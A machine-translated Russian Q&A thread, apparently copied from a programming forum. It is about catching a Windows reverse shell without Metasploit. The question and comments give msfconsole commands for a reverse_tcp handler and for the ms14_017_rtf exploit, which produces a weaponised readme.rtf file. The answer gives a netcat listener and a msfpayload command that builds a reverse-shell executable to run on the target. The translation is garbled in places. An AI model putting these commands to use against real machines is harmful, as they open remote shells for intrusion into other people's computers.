2015-11-06 3 views
0

Извините за мой английский. Используя metasploit, я создал эксплойт для Windows 7 с полезной нагрузкой windows/shell/reverse_tcp. Тогда я ждал соединение с использованием msfconsole:Автономный мульти/погрузчик reverse_tcp

use exploit/multi/handler 
set PAYLOAD windows/shell/reverse_tcp 
set LHOST 192.168.182.129 
set LPORT 4444 
exploit 

Я успешно подключен к командной строке окна. Однако мне нужно ожидать соединения, не используя metasploit. Я нашел, как создать автономный модуль, но это было только для эксплойта. Мне нужен автономный мульти/обработчик reverse_tcp или просто код, который прослушивает определенный порт, а затем дает доступ к командной строке.

ответ

0

Я действительно не знаю, что ваши ограничения/ограничения есть.
Я предполагаю, что вы хотите «получить ракеты» на компьютере без установленного на нем метаплана.
Если это так, то вы могли бы использовать MSFD (Metasploit демон установлен на другом компьютере) или просто NetCat, SOCAT, ...

Что вы думаете об этом:

  • прослушивания с Netcat на 192.168.1.2
    # nc -l -p 4444
  • Использование shell_reverse_tcp вместо
    # msfpayload windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 X /root/darkbird.exe
  • Выполнить darkbird.exe на цель
+0

Благодарим за отзыв. Я пробовал nc раньше. Соединение установлено. Но я не могу отправлять команды (dir или другой). Я печатаю dir на сервере (где выполняется nc), но ничего не происходит. – tiigg

+0

Какую команду вы использовали для создания shellcode? –

+0

'использование эксплуатируют/окна/FileFormat/ms14_017_rtf'
' набор полезной нагрузки окна/оболочка/reverse_tcp'

'установить имя файла readme.rtf'
' набор lhost 192.168.182.129'

'эксплуатируют '
Он генерирует rtf-файл с обратной нагрузкой tcp. Затем я запускаю этот файл в окнах. А окна должны подключаться к серверу. – tiigg